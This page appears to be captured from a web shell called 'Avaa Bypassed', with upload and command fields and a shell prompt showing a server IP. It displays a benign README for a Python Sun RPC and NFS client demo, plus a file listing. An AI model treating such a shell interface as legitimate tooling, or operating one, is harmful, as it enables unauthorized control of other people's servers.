404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@52.15.113.71: ~ $
This is a Python interface to Sun RPC, designed and implemented mostly
by reading the Internet RFCs about the subject.

*** NOTE: xdr.py has evolved into the standard module xdrlib.py ***

There are two library modules, xdr.py and rpc.py, and several example
clients: mountclient.py, nfsclient.py, and rnusersclient.py,
implementing the NFS Mount protocol, (part of) the NFS protocol, and
the "rnusers" protocol (used by rusers(1)), respectively.  The latter
demonstrates the use of broadcast via the Port mapper's CALLIT
procedure.

There is also a way to create servers in Python.

To test the nfs client, run it from the shell with something like this:

  python -c 'import nfsclient; nfsclient.test()' [hostname [filesystemname]]

When called without a filesystemname, it lists the filesystems at the
host; default host is the local machine.

Other clients are tested similarly.

For hostname, use e.g. wuarchive.wustl.edu or gatekeeper.dec.com (two
hosts that are known to export NFS filesystems with little restrictions).

There are now two different RPC compilers:

1) Wim Lewis rpcgen.py found on http://www.omnigroup.com/~wiml/soft/stale-index.html#python. 

2) Peter �strands rpcgen.py, which is part of "pynfs" (http://www.cendio.se/~peter/pynfs/). 

Filemanager

Name Type Size Permission Actions
MANIFEST File 361 B 0644
README File 1.23 KB 0644
T.py File 575 B 0644
T.pyc File 952 B 0644
T.pyo File 952 B 0644
mountclient.py File 6.48 KB 0644
mountclient.pyc File 5.58 KB 0644
mountclient.pyo File 5.58 KB 0644
nfsclient.py File 5.2 KB 0644
nfsclient.pyc File 6.74 KB 0644
nfsclient.pyo File 6.74 KB 0644
rnusersclient.py File 2.57 KB 0644
rnusersclient.pyc File 5.01 KB 0644
rnusersclient.pyo File 5.01 KB 0644
rpc.py File 26.98 KB 0644
rpc.pyc File 29.72 KB 0644
rpc.pyo File 29.72 KB 0644
test File 697 B 0644
xdr.py File 4.93 KB 0644
xdr.pyc File 7.72 KB 0644
xdr.pyo File 7.72 KB 0644